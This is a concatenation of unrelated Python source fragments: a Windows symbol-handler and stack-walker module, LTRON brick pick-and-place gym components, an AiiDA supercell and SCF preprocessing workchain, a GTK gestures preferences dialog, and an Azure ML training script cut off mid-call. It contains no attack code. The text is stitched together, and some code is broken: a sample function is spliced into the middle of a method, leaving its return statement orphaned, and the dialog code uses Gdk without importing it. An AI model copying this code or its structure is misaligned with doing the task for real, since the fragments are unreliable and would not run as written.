self._stack_frame_generator() # Autorise to force the retrieving of 32b stack when code is currently on 64b code ? def _get_effective_context_and_machine(self): ctx = self.context or self.thread.context if self.process.bitness == 32: # Process is 32b, so the context is inevitably x86 return (ctx, gdef.IMAGE_FILE_MACHINE_I386) if windows.current_process.bitness == 32: # If we are 32b, we will only be able to handle x86 stack # ctx is obligatory a 32b one, as the case us32/target64 is handled # in __init__ with a NotImplementedError return (ctx, gdef.IMAGE_FILE_MACHINE_I386) if self.process.bitness == 64: # Process is 64b, so the context is inevitably x64 return (ctx, gdef.IMAGE_FILE_MACHINE_AMD64) # Thing get a little more complicated here :) # We are a 64b process and target is 32b. # So we must find-out if we are in 32 or 64b world at the moment. # The context_syswow.SegCS give us the information # The context32.SegCs would be always 32 ctxsyswow = dbg.current_thread.context_syswow if ctxsyswow.SegCs == gdef.CS_USER_32B: return (ctx, gdef.IMAGE_FILE_MACHINE_I386) return (ctxsyswow, gdef.IMAGE_FILE_MACHINE_AMD64) def _setup_initial_frame_from_context(self, ctx, machine): frame = gdef.STACKFRAME_EX() frame.AddrPC.Mode = gdef.AddrModeFlat frame.AddrFrame.Mode = gdef.AddrModeFlat frame.AddrStack.Mode = gdef.AddrModeFlat frame.AddrPC.Offset = ctx.pc frame.AddrStack.Offset = ctx.sp if machine == gdef.IMAGE_FILE_MACHINE_I386: frame.AddrFrame.Offset = ctx.Ebp # Need RBP on 64b ? 
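# Hedged usage sketch (illustrative only): walking a thread's stack and resolving each program
# counter through a symbol handler. Assumes `resolver` is a ProcessSymbolHandler for the
# thread's process and that frame.AddrPC.Offset holds the frame's program counter.
def _stackwalk_example(resolver, thread):
    walker = StackWalker(resolver, thread=thread)
    for frame in walker:
        pc = frame.AddrPC.Offset
        sym = resolver.resolve(pc)  # may be None if no module covers pc
        print("{0:#x} {1}".format(pc, sym))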
return frame class VirtualSymbolHandler(SymbolHandler): """A SymbolHandler where its handle is not a valid process handle Allow to create/resolve symbol in a 'virtual' process But all API needing a real process handle will fail """ VIRTUAL_HANDLER_COUNTER = itertools.count(0x11223344) def __init__(self, search_path=None): handle = next(self.VIRTUAL_HANDLER_COUNTER) super(VirtualSymbolHandler, self).__init__(handle, search_path, False) # The VirtualSymbolHandler is not based on an existing process # So load() in its simplest for should just take the path of the file to load load = SymbolHandler.load_file def refresh(self): # Do nothing on a VirtualSymbolHandler return False class ProcessSymbolHandler(SymbolHandler): def __init__(self, process, search_path=None, invade_process=False): super(ProcessSymbolHandler, self).__init__(process.handle, search_path, invade_process) self.target = process # The ProcessSymbolHandler is based on an existing process # So load() in its simplest form should be able to load the symbol for an existing # module that is already loaded # Question: should be able to load other module at other address ? def load(self, name): mods = [x for x in self.target.peb.modules if x.name == name] if not mods: raise ValueError("Could not find module <{0}>".format(name)) assert len(mods) == 1 # Load all if multiple match ? mod = mods[0] return self.load_module(addr=mod.baseaddr, path=mod.fullname) def refresh(self): return windows.winproxy.SymRefreshModuleList(self.handle) def stackwalk(self, ctx): pass class SymbolEngine(object): def set_options(self, options): return windows.winproxy.SymSetOptions(options) def get_options(self): return windows.winproxy.SymGetOptions() options = property(get_options, set_options) engine = SymbolEngine() TST_TYPE_RES_TYPE = { gdef.TI_GET_SYMNAME: gdef.LPWSTR, gdef.TI_GET_LENGTH: gdef.ULONG64, gdef.TI_GET_ADDRESS: gdef.ULONG64, gdef.TI_GTIEX_REQS_VALID: gdef.ULONG64, gdef.TI_GET_SYMTAG: gdef.SymTagEnum, } # class ProcessSymbolResolver(SymbolResolver): # def load_all(self): # result = [] # for mod in self.target.peb.modules: # try: # result.append(self.load_module(BaseOfDll=mod.baseaddr, ImageName=mod.fullname)) # except WindowsError as e: # # Already loaded: ignore the error # if e.winerror == gdef.ERROR_SUCCESS: # continue # return result import math import numpy from pyquaternion import Quaternion from ltron.gym.components.ltron_gym_component import LtronGymComponent from gym.spaces import ( Discrete, Tuple, Dict, MultiDiscrete ) from ltron.gym.spaces import ( SinglePixelSelectionSpace, ) from ltron.geometry.utils import matrix_is_mirrored from ltron.geometry.collision import check_collision class HandspacePickAndPlace(LtronGymComponent): def __init__(self, workspace_scene_component, workspace_pos_snap_component, workspace_neg_snap_component, handspace_scene_component, handspace_pos_snap_component, handspace_neg_snap_component, check_collisions=False, ): self.workspace_scene_component = workspace_scene_component self.workspace_pos_snap_component = workspace_pos_snap_component self.workspace_neg_snap_component = workspace_neg_snap_component self.handspace_scene_component = handspace_scene_component self.handspace_pos_snap_component = handspace_pos_snap_component self.handspace_neg_snap_component = handspace_neg_snap_component self.check_collisions = check_collisions self.workspace_width = self.workspace_pos_snap_component.width self.workspace_height = self.workspace_pos_snap_component.height self.handspace_width = 
self.handspace_pos_snap_component.width self.handspace_height = self.handspace_pos_snap_component.height activate_space = Discrete(2) polarity_space = Discrete(2) pick_space = SinglePixelSelectionSpace( self.handspace_width, self.handspace_height) place_space = SinglePixelSelectionSpace( self.workspace_width, self.workspace_height) place_at_origin_space = Discrete(2) self.observation_space = Dict({'success':Discrete(2)}) self.action_space = Dict({ 'activate':activate_space, 'polarity':polarity_space, 'pick':pick_space, 'place':place_space, 'place_at_origin':place_at_origin_space, }) def reset(self): return {'success':False} def step(self, action): activate = action['activate'] if not activate: return {'success':False}, 0., False, {} polarity = action['polarity'] pick_y, pick_x = action['pick'] place_y, place_x = action['place'] place_at_origin = action['place_at_origin'] if polarity == 1: pick_map = self.handspace_pos_snap_component.observation place_map = self.workspace_neg_snap_component.observation else: pick_map = self.handspace_neg_snap_component.observation place_map = self.workspace_pos_snap_component.observation try: pick_instance_id, pick_snap_id = pick_map[pick_y, pick_x] except IndexError: pick_instance_id = 0 try: place_instance_id, place_snap_id = place_map[place_y, place_x] except IndexError: place_instance_id = 0 if pick_instance_id == 0: return {'success':0}, 0, False, None if place_instance_id == 0 and not place_at_origin: return {'success':0}, 0, False, None workspace_scene = self.workspace_scene_component.brick_scene handspace_scene = self.handspace_scene_component.brick_scene pick_instance = handspace_scene.instances[pick_instance_id] pick_brick_shape = pick_instance.brick_shape pick_brick_color = pick_instance.color brick_shape_snap = pick_brick_shape.snaps[pick_snap_id] brick_shape_snap_transform = brick_shape_snap.transform if matrix_is_mirrored(brick_shape_snap_transform): brick_shape_snap_transform[0:3,0] *= -1 workspace_view_matrix = workspace_scene.get_view_matrix() handspace_view_matrix = handspace_scene.get_view_matrix() best_workspace_transform = None best_pseudo_angle = -float('inf') for i in range(4): angle = i * math.pi / 2 rotation = Quaternion(axis=(0,1,0), angle=angle) workspace_transform = ( workspace_scene.upright @ rotation.transformation_matrix @ numpy.linalg.inv(brick_shape_snap_transform) ) handspace_camera_local = ( handspace_view_matrix @ pick_instance.transform) workspace_camera_local = ( workspace_view_matrix @ workspace_transform) offset = ( workspace_camera_local @ numpy.linalg.inv(handspace_camera_local) ) pseudo_angle = numpy.trace(offset[:3,:3]) if pseudo_angle > best_pseudo_angle: best_pseudo_angle = pseudo_angle best_workspace_transform = workspace_transform new_brick = workspace_scene.add_instance( str(pick_brick_shape), pick_brick_color, best_workspace_transform, ) if place_at_origin: if self.check_collisions: collision = workspace_scene.check_snap_collision( [new_brick], new_brick.get_snap(pick_snap_id)) if collision: workspace_scene.remove_instance(new_brick) success = False else: success = True else: success = True else: workspace_scene.pick_and_place_snap( (new_brick.instance_id, pick_snap_id), (place_instance_id, place_snap_id), ) if self.check_collisions: collision = workspace_scene.check_snap_collision( [new_brick], new_brick.get_snap(pick_snap_id)) if collision: workspace_scene.remove_instance(new_brick) success = False else: success = True else: success = True if success: handspace_scene.clear_instances() return 
{'success':success}, 0., False, {} def no_op_action(self): return { 'activate':0, 'polarity':0, 'pick':numpy.array([0,0]), 'place':numpy.array([0,0]), 'place_at_origin':0, } class CursorHandspacePickAndPlace(LtronGymComponent): def __init__(self, workspace_scene_component, workspace_cursor_component, handspace_scene_component, handspace_cursor_component, check_collisions=False, ): self.workspace_scene_component = workspace_scene_component self.workspace_cursor_component = workspace_cursor_component self.handspace_scene_component = handspace_scene_component self.handspace_cursor_component = handspace_cursor_component self.check_collisions = check_collisions self.observation_space = Dict({'success':Discrete(2)}) self.action_space = Discrete(3) def reset(self): return {'success':False} def step(self, action): if not action: return {'success':False}, 0., False, {} place_at_origin = action == 2 pick_instance_id = self.handspace_cursor_component.instance_id pick_snap_id = self.handspace_cursor_component.snap_id place_instance_id = self.workspace_cursor_component.instance_id place_snap_id = self.workspace_cursor_component.snap_id if pick_instance_id == 0: return {'success':0}, 0, False, None if place_instance_id == 0 and not place_at_origin: return {'success':0}, 0, False, None workspace_scene = self.workspace_scene_component.brick_scene handspace_scene = self.handspace_scene_component.brick_scene pick_instance = handspace_scene.instances[pick_instance_id] pick_brick_shape = pick_instance.brick_shape pick_brick_color = pick_instance.color brick_shape_snap = pick_brick_shape.snaps[pick_snap_id] brick_shape_snap_transform = brick_shape_snap.transform if matrix_is_mirrored(brick_shape_snap_transform): brick_shape_snap_transform[0:3,0] *= -1 workspace_view_matrix = workspace_scene.get_view_matrix() handspace_view_matrix = handspace_scene.get_view_matrix() transferred_transform = ( numpy.linalg.inv(workspace_view_matrix) @ handspace_view_matrix @ pick_instance.transform ) new_brick = workspace_scene.add_instance( str(pick_brick_shape), pick_brick_color, transferred_transform, ) if place_at_origin: place = None else: place = (place_instance_id, place_snap_id) success = workspace_scene.pick_and_place_snap( (new_brick.instance_id, pick_snap_id), place, check_collisions=self.check_collisions, ) if success: handspace_scene.clear_instances() else: workspace_scene.remove_instance(new_brick) return {'success':success}, 0, False, None def no_op_action(self): return 0 class PickAndPlace(LtronGymComponent): def __init__(self, scene, pos_snap_render, neg_snap_render, check_collisions ): self.scene_component = scene self.action_executed = 0 self.pos_snap_render = pos_snap_render self.neg_snap_render = neg_snap_render self.width = self.pos_snap_render.width self.height = self.pos_snap_render.height self.check_collisions = check_collisions assert self.neg_snap_render.width == self.width assert self.neg_snap_render.height == self.height activate_space = Discrete(2) polarity_space = Discrete(2) pick_space = SinglePixelSelectionSpace(self.width, self.height) place_space = SinglePixelSelectionSpace(self.width, self.height) self.action_space = Dict({ 'activate':activate_space, 'polarity':polarity_space, 'pick':pick_space, 'place':place_space, }) self.observation_space = Dict({'success': Discrete(2)}) def reset(self): return {'success':False} def step(self, action): #if action is None: return None, 0, False, None #polarity = action[0] # Integer, 0 or 1 # pick_x, pick_y = action[1]+100, action[2]+100 # a tuple, 
corresponding to the coordinate of pick location # place_x, place_y = action[3]+150, action[4]+150 # a tuple, corresponding to the coordinate of place location #pick_x, pick_y = action[1], action[2] #place_x, place_y = action[3], action[4] #activate, polarity, pick, place = action activate = action['activate'] if not activate: return {'success': 0}, 0., False, {} polarity = action['polarity'] pick_y, pick_x = action['pick'] place_y, place_x = action['place'] if polarity == 1: pick_map = self.pos_snap_render.observation place_map = self.neg_snap_render.observation else: pick_map = self.neg_snap_render.observation place_map = self.pos_snap_render.observation pick_instance, pick_id = pick_map[pick_y, pick_x] place_instance, place_id = place_map[place_y, place_x] # if check_collision(self.scene_component.brick_scene, pick_instance, abs(polarity - 1), (self.width, self.height)): # return {'pick_place_succeed': 0}, 0, False, None if pick_instance == 0 and pick_id == 0: return {'success' : 0}, 0, False, None if place_instance == 0 and place_id == 0: return {'success' : 0}, 0, False, None if pick_instance == place_instance: return {'success' : 0}, 0, False, None if self.check_collisions: instance = self.scene_component.brick_scene.instances[pick_instance] initial_transform = instance.transform snap = instance.get_snap(pick_id) collision = self.scene_component.brick_scene.check_snap_collision( [instance], snap) if collision: self.scene_component.brick_scene.move_instance( instance, initial_transform) return {'success': 0}, 0, False, None place_instance = self.scene_component.brick_scene.instances[place_instance] self.scene_component.brick_scene.pick_and_place_snap( (pick_instance, pick_id), (place_instance, place_id)) collision = self.scene_component.check_snap_collision( [instance], snap) if collision: self.scene_component.brick_scene.move_instance( instance, initial_transform) return {'success': 0}, 0, False, None else: return {'success': 1}, 0, False, None else: self.scene_component.brick_scene.pick_and_place_snap( (pick_instance, pick_id), (place_instance, place_id)) return {'success' : 1}, 0, False, None # the observation is whether the action succeeds or not def no_op_action(self): return { 'activate':0, 'polarity':0, 'pick':numpy.array([0,0]), 'place':numpy.array([0,0]), } aiida_flipper/workflows/preprocess.py # -*- coding: utf-8 -*- from aiida import orm from aiida.engine.processes.workchains.workchain import WorkChain from aiida_quantumespresso.workflows.protocols.utils import ProtocolMixin from aiida.common import AttributeDict, exceptions from aiida.plugins import WorkflowFactory from aiida.engine import ToContext, if_, ExitCode, append_ from aiida_quantumespresso.utils.mapping import prepare_process_inputs from aiida_quantumespresso.common.types import ElectronicType from aiida.common.datastructures import StashMode PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base') def make_supercell(structure, distance): from supercellor import supercell as sc pym_sc_struct = sc.make_supercell(structure.get_pymatgen_structure(), distance, verbosity=0, do_niggli_first=False)[0] sc_struct = orm.StructureData() sc_struct.set_extra('original_unitcell', structure.uuid) sc_struct.set_pymatgen(pym_sc_struct) return sc_struct def delithiate_structure(structure, element_to_remove): """ Take the input structure and create two structures from it. 
One structure is flipper_compatible/pinball_structure which is essentially the same structure, just that Li is on first places both in kinds and sites as required for the flipper; the other structure has no Lithium """ assert isinstance(structure, orm.StructureData), "input structure needs to be an instance of {}".format(orm.StructureData) pinball_kinds = [kind for kind in structure.kinds if kind.symbol == element_to_remove] kindnames_to_delithiate = [kind.name for kind in pinball_kinds] non_pinball_kinds = [k for i,k in enumerate(structure.kinds) if k.symbol != element_to_remove] non_pinball_sites = [s for s in structure.sites if s.kind_name not in kindnames_to_delithiate] pinball_sites = [s for s in structure.sites if s.kind_name in kindnames_to_delithiate] delithiated_structure = orm.StructureData() pinball_structure = orm.StructureData() delithiated_structure.set_cell(structure.cell) delithiated_structure.set_attribute('delithiated_structure', True) delithiated_structure.set_attribute('missing_Li', len(pinball_sites)) pinball_structure.set_cell(structure.cell) pinball_structure.set_attribute('pinball_structure', True) pinball_structure.set_extra('original_unitcell', structure.extras['original_unitcell']) pinball_structure.set_attribute('original_unitcell', structure.extras['original_unitcell']) [pinball_structure.append_kind(_) for _ in pinball_kinds] [pinball_structure.append_site(_) for _ in pinball_sites] [pinball_structure.append_kind(_) for _ in non_pinball_kinds] [pinball_structure.append_site(_) for _ in non_pinball_sites] [delithiated_structure.append_kind(_) for _ in non_pinball_kinds] [delithiated_structure.append_site(_) for _ in non_pinball_sites] delithiated_structure.label = delithiated_structure.get_formula(mode='count') pinball_structure.label = pinball_structure.get_formula(mode='count') return dict(pinball_structure=pinball_structure, delithiated_structure=delithiated_structure) class PreProcessWorkChain(ProtocolMixin, WorkChain): """ WorkChain that takes a primitive structure as its input and makes supercell using Supercellor class, makes the pinball and delithiated structures and then performs an scf calculation on the host lattice, stashes the charge densities and wavefunctions. It outputs the pinball supercell and RemoteData containing charge densities to be used in all future workchains for performing MD. 
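A typical way to drive it (hypothetical usage; ``code`` and ``structure`` stand for an installed ``quantumespresso.pw`` code and a primitive ``StructureData`` node) is through the protocol builder::

    from aiida.engine import submit
    builder = PreProcessWorkChain.get_builder_from_protocol(code, structure, distance=10.0)
    submit(builder)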
""" @classmethod def define(cls, spec): super().define(spec) spec.expose_inputs(PwBaseWorkChain, namespace='prepro', exclude=('clean_workdir', 'pw.structure', 'pw.parent_folder'), namespace_options={'help': 'Inputs for the `PwBaseWorkChain` for running the scf on host lattice.'}) spec.input('clean_workdir', valid_type=orm.Bool, help='If `True`, work directories of all called calculation will be cleaned at the end of execution.') spec.input('distance', valid_type=orm.Float, help='The minimum image distance as a float, the cell created will not have any periodic image below this distance.') spec.input('element_to_remove', valid_type=orm.Str, help='The element that will become the pinball, typically Lithium.') spec.input('stash_directory', valid_type=orm.Str, required=False, help='The location where host lattice charge denisites will be stored.') spec.input('structure', valid_type=orm.StructureData, required=True, help='The primitive structure that is used to build the supercell for MD simulations.') spec.outline( cls.supercell, cls.setup, cls.run_scf, cls.inspect_scf, cls.result) spec.output('pinball_supercell', valid_type=orm.StructureData, help='The Pinball/Flipper compatible structure onto which MD will be run.') spec.output('host_lattice_scf_output', valid_type=orm.RemoteData, help='The node containing the symbolic link to the stashed charged densities.') spec.exit_code(611, 'ERROR_SCF_FINISHED_WITH_ERROR', message='Host Lattice pw scf calculation finished but with some error code.') spec.exit_code(612, 'ERROR_SCF_FAILED', message='Host Lattice pw scf calculation did not finish.') spec.exit_code(613, 'ERROR_KPOINTS_NOT_SPECIFIED', message='Only gamma or automatic kpoints argument is allowed.') def supercell(self): # Create the supercells and store the pinball/flipper structure and delithiated structure in a dictionary if self.inputs.distance == 0: sc_struct = self.inputs.structure else: sc_struct = make_supercell(self.inputs.structure, self.inputs.distance) self.ctx.supercell = delithiate_structure(sc_struct, self.inputs.element_to_remove) def setup(self): """Input validation and context setup.""" # I store all the input dictionaries in context variables self.ctx.preprocess_inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='prepro')) self.ctx.preprocess_inputs.pw.parameters = self.ctx.preprocess_inputs.pw.parameters.get_dict() self.ctx.preprocess_inputs.pw.settings = self.ctx.preprocess_inputs.pw.settings.get_dict() if not self.ctx.preprocess_inputs.pw.settings['gamma_only']: return self.exit_codes.ERROR_KPOINTS_NOT_SPECIFIED @classmethod def get_protocol_filepath(cls): """Return ``pathlib.Path`` to the ``.yaml`` file that defines the protocols.""" from importlib_resources import files from aiida_flipper.workflows import protocols as proto return files(proto) / 'preprocess.yaml' @classmethod def get_builder_from_protocol( cls, code, structure, distance, element_to_remove=None, stash_directory=None, protocol=None, overrides=None, **kwargs ): """Return a builder prepopulated with inputs selected according to the chosen protocol. :param code: the ``Code`` instance configured for the ``quantumespresso.pw`` plugin. :param structure: the ``StructureData`` instance to use. 
:param distance: the ``distance`` used to make supercells, if distance is 0 I assume to take it as supercell and do not generate another supercell, do NOT change it after calling the builder :param elemet_to_remove: the ``element`` treated as pinball in the model, do NOT change it after calling the builder :param stash_directory: the ``path`` where the charge densities of host lattice are stored :param protocol: protocol to use, if not specified, the default will be used. :param overrides: optional dictionary of inputs to override the defaults of the protocol. :param kwargs: additional keyword arguments that will be passed to the ``get_builder_from_protocol`` of all the sub processes that are called by this workchain. :return: a process builder instance with all inputs defined ready for launch. """ inputs = cls.get_protocol_inputs(protocol, overrides) if element_to_remove: element = element_to_remove else: element = inputs['element_to_remove'] if stash_directory: stash = stash_directory else: stash = orm.Str(inputs['stash_directory']) if distance == 0: sc_struct = structure else: sc_struct = make_supercell(structure, distance) supercell = delithiate_structure(sc_struct, element) args = (code, structure, protocol) PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base') prepro = PwBaseWorkChain.get_builder_from_protocol(*args, electronic_type=ElectronicType.INSULATOR, overrides=inputs['prepro'], **kwargs) prepro['pw'].pop('structure', None) prepro.pop('clean_workdir', None) prepro['pw']['metadata']['options'].update({'stash': {'source_list': ['out', 'aiida.in', 'aiida.out'], 'target_base': stash.value, 'stash_mode': StashMode.COPY.value}}) prepro['pw']['parameters']['SYSTEM']['tot_charge'] = float(-supercell['delithiated_structure'].attributes['missing_Li']) # removing the Li upf data because the input structure of this builder is unitcell with Li, while the input structure of PwBaseWorkChain is delithiated supercell prepro['pw']['pseudos'].pop('Li', None) if 'settings' in inputs['prepro']['pw']: prepro['pw'].settings = orm.Dict(dict=inputs['prepro']['pw']['settings']) if inputs['prepro']['pw']['settings']['gamma_only']: kpoints = orm.KpointsData() kpoints.set_kpoints_mesh([1,1,1]) prepro.kpoints = kpoints else: raise NotImplementedError('Only gamma k-points possible in flipper calculations, so it is recommended to use the same in host lattice calculation.') builder = cls.get_builder() builder.prepro = prepro builder.structure = structure builder.clean_workdir = orm.Bool(inputs['clean_workdir']) builder.distance = orm.Float(distance) builder.element_to_remove = orm.Str(element) return builder def run_scf(self): inputs = self.ctx.preprocess_inputs inputs.pw.structure = self.ctx.supercell['delithiated_structure'] inputs = prepare_process_inputs(PwBaseWorkChain, inputs) running = self.submit(PwBaseWorkChain, **inputs) self.report(f'launching PwBaseWorkChain<{running.pk}>') return ToContext(add_node=running) def inspect_scf(self): # Check if the scf finished properly, and stash the charge densities workchain = self.ctx.add_node if workchain.is_excepted or workchain.is_killed: self.report('Host Lattice scf was excepted or killed') return self.exit_codes.ERROR_SCF_FAILED if workchain.is_failed: self.report(f'Host Lattice scf failed with exit status {workchain.exit_status}') return self.exit_codes.ERROR_SCF_FAILED try: stashed_folder_data = workchain.outputs.remote_stash self.ctx.stashed_data = orm.RemoteData(remote_path=stashed_folder_data.attributes['target_basepath'], 
computer=stashed_folder_data.computer) except Exception: self.report(f'Host Lattice scf finished with exit status {workchain.exit_status}, but stashed directories not found.') return self.exit_codes.ERROR_SCF_FINISHED_WITH_ERROR def result(self): if self.inputs.distance == 0: self.out('pinball_supercell', self.inputs.structure) else: self.out('pinball_supercell', self.ctx.supercell['pinball_structure']) self.out('host_lattice_scf_output', self.ctx.stashed_data) President-Temitope/gestures import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk from gestures.configfile import ConfigFileHandler class PreferencesDialog(Gtk.Dialog): def __init__(self,parent, confFile): self.confFile = confFile Gtk.Dialog.__init__(self, "Preferences", parent, 0, Gtk.ButtonsType.NONE) self.set_transient_for(parent) self.set_modal(True) self.set_default_size(480, 100) self.connect("destroy", self.onDestroy) area = self.get_content_area() if(self.confFile.swipe_threshold != None): value = self.confFile.swipe_threshold else: value = 0 box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, margin = 10) area.add(box) label = Gtk.Label("Swipe threshold") slider = Gtk.Scale(orientation=Gtk.Orientation.HORIZONTAL, adjustment=Gtk.Adjustment(value, 0, 100, 5, 10, 0)) slider.connect("value-changed", self.onSwipeThresholdChanged) slider.set_hexpand(True) slider.set_digits(0) box.add(label) box.add(slider) area.show_all() def onSwipeThresholdChanged(self, widget): value = int(widget.get_value()) if(value >= 0 and value <= 100): self.confFile.swipe_threshold = value def onDestroy(self, window): self.confFile.save() class UnsupportedLinesDialog(Gtk.Dialog): def __init__(self, parent, confFile): Gtk.Dialog.__init__(self, "Edit unsupported lines", parent, 0, Gtk.ButtonsType.NONE) self.set_transient_for(parent) self.set_modal(True) self.set_default_size(480, 200) area = self.get_content_area() hb = Gtk.HeaderBar() hb.set_show_close_button(False) cancelButton = Gtk.Button("Cancel") cancelButton.modify_bg(Gtk.StateType.ACTIVE, Gdk.color_parse('red')) hb.pack_start(cancelButton) confirmButton = Gtk.Button("Confirm") confirmButton.modify_bg(Gtk.StateType.ACTIVE, Gdk.color_parse('teal')) hb.pack_end(confirmButton) self.set_titlebar(hb) confirmButton.connect("clicked", self.onConfirm) cancelButton.connect("clicked", self.onCancel) scrolledwindow = Gtk.ScrolledWindow() scrolledwindow.set_hexpand(True) scrolledwindow.set_vexpand(True) area.add(scrolledwindow) self.textview = Gtk.TextView() self.textbuffer = self.textview.get_buffer() lines = '\n'.join(confFile.validUnsupportedLines[1:]) self.textbuffer.set_text(lines) scrolledwindow.add(self.textview) self.show_all() def onCancel(self, widget): self.response(Gtk.ResponseType.CANCEL) def onConfirm(self, widget): self.response(Gtk.ResponseType.OK) """ Copyright (C) Microsoft Corporation. All rights reserved.​ ​ Microsoft Corporation (“Microsoft”) grants you a nonexclusive, perpetual, royalty-free right to use, copy, and modify the software code provided by us ("Software Code"). You may not sublicense the Software Code or any use of it (except to your affiliates and to vendors to perform work on your behalf) through distribution, network access, service agreement, lease, rental, or otherwise. This license does not purport to express any claim of ownership over data you may have shared with Microsoft in the creation of the Software Code. 
Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted herein, whether by implication, estoppel or otherwise. ​ ​ THE SOFTWARE CODE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL MICROSOFT OR ITS LICENSORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THE SOFTWARE CODE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ from azureml.core.run import Run from azureml.core import Dataset, Datastore, Workspace import os import argparse from train import train_model, get_model_metrics from train_data_drift import train_autoencoder, autoencoder_get_model_metrics import numpy as np from util.model_helper import get_latest_model import tensorflow.keras as k from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt def register_dataset( aml_workspace: Workspace, dataset_name: str, datastore_name: str, file_path: str ) -> Dataset: datastore = Datastore.get(aml_workspace, datastore_name) dataset = Dataset.Tabular.from_delimited_files(path=(datastore, file_path)) dataset = dataset.register(workspace=aml_workspace, name=dataset_name, create_new_version=True) return dataset def main(): print("Running train_aml.py") parser = argparse.ArgumentParser("train") parser.add_argument( "--model_name", type=str, help="Name of the Model", default="mnist_model.h5", ) parser.add_argument( "--autoencoder_name", type=str, help="Name of the autoencoder Model", default="data_drift_model.h5", ) parser.add_argument( "--step_output", type=str, help=("output for passing data to next step") ) parser.add_argument( "--dataset_version", type=str, help=("dataset version") ) parser.add_argument( "--data_file_path", type=str, help=("data file path, if specified,\ a new version of the dataset will be registered") ) parser.add_argument( "--caller_run_id", type=str, help=("caller run id, for example ADF pipeline run id") ) parser.add_argument( "--dataset_name", type=str, help=("Dataset name. Dataset must be passed by name\ to always get the desired dataset version\ rather than the one used while the pipeline creation") ) parser.add_argument( "--label_dataset_name", type=str, help=("Dataset name. 
Dataset must be passed by name\ to always get the desired dataset version\ rather than the one used while the pipeline creation") ) parser.add_argument( "--n_epochs", type=int, help=("n_epochs") ) parser.add_argument( "--batch_size", type=int, help=("batch size") ) parser.add_argument( "--autoencoder_n_epochs", type=int, help=("n_epochs") ) parser.add_argument( "--autoencoder_batch_size", type=int, help=("batch size") ) args = parser.parse_args() print("Argument [model_name]: %s" % args.model_name) print("Argument [autoencoder_name]: %s" % args.autoencoder_name) print("Argument [step_output]: %s" % args.step_output) print("Argument [dataset_version]: %s" % args.dataset_version) print("Argument [data_file_path]: %s" % args.data_file_path) print("Argument [caller_run_id]: %s" % args.caller_run_id) print("Argument [dataset_name]: %s" % args.dataset_name) print("Argument [label_dataset_name]: %s" % args.label_dataset_name) model_name = args.model_name autoencoder_name = args.autoencoder_name step_output_path = args.step_output dataset_version = args.dataset_version data_file_path = args.data_file_path dataset_name = args.dataset_name label_dataset_name = args.label_dataset_name n_epochs = args.n_epochs batch_size = args.batch_size autoencoder_n_epochs = args.autoencoder_n_epochs autoencoder_batch_size = args.autoencoder_batch_size run = Run.get_context() exp = run.experiment ws = run.experiment.workspace tag_name = 'experiment_name' autoencoder = get_latest_model( autoencoder_name, tag_name, exp.name, ws) # Get the dataset if (dataset_name): if (data_file_path == 'none'): dataset = Dataset.get_by_name(run.experiment.workspace, dataset_name, dataset_version) # NOQA: E402, E501 else: dataset = register_dataset(run.experiment.workspace, dataset_name, os.environ.get("DATASTORE_NAME"), data_file_path) else: e = ("No dataset provided") print(e) raise Exception(e) # Link dataset to the step run so it is trackable in the UI run.input_datasets['training_data'] = dataset run.parent.tag("dataset_id", value=dataset.id) dataset2 = Dataset.get_by_name(run.experiment.workspace, dataset_name) mount_context = dataset2.mount() mount_context.start() # this will mount the file streams data = np.load( mount_context.mount_point + '/image_data_by_person_all4_no_filter_2500_20prc.npy') mount_context.stop() # this will unmount the file streams label_dataset = Dataset.get_by_name( run.experiment.workspace, label_dataset_name ) mount_context = label_dataset.mount() mount_context.start() # this will mount the file streams labels = np.load( mount_context.mount_point + '/labels_by_person_all4_no_filter_2500_20prc.npy') mount_context.stop() # this will unmount the file streams labelSubset = labels dataSubset = data dataSubset = dataSubset.reshape(len(dataSubset), 57, 86, 1) labelSubset = k.utils.to_categorical(labelSubset) x_train, x_test, y_train, y_test = train_test_split( dataSubset, labelSubset, test_size=0.2, shuffle=True, stratify=labelSubset ) # Train the model train_meta_data = train_model( x_train, y_train, x_test, y_test, n_epochs, batch_size ) model = train_meta_data[0] hist_train = train_meta_data[1] # Evaluate and log the metrics returned from the train function metrics = get_model_metrics(model, x_test, y_test) run.log("test loss", metrics[0]) run.log("test accuracy", metrics[1]) run.parent.log("test loss", metrics[0]) run.parent.log("test accuracy", metrics[1]) # plot the graph of training vs accuracy plt.style.use("ggplot") plt.figure() plt.plot( np.arange(0, n_epochs), hist_train.history["loss"], 
